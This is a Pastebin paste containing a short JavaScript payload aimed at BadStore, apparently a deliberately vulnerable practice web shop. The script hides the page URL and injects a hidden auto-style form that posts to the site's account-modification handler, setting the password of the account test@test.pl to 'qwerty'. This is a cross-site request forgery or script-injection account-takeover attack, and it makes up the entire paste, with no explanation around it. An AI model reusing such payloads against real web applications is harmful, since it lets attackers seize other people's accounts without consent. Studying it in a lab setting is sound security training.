Advertisement
Guest User

Untitled

a guest
Dec 7th, 2019
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.72 KB | None | 0 0
  1. function thingie() {
  2. history.pushState('', '', '/')
  3. const element = document.getElementById('id12');
  4. element.innerHTML = '
  5. <div class="graphic_textbox_layout_style_default">
  6. <form action="http://www.badstore.net/cgi-bin/badstore.cgi?action=moduser" method="POST">
  7. <input type="hidden" name="fullname" value="">
  8. <input type="hidden" name="newemail" value="">
  9. <input type="hidden" name="newpasswd" value="qwerty">
  10. <input type="hidden" name="vnewpasswd" value="qwerty">
  11. <input type="hidden" name="role" value="U">
  12. <input type="hidden" name="email" value="test@test.pl">
  13. <input type="hidden" name="DoMods" value="Change Account">
  14. <input type="submit" value="Submit request">
  15. </form>
  16. </div>';};thingie();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement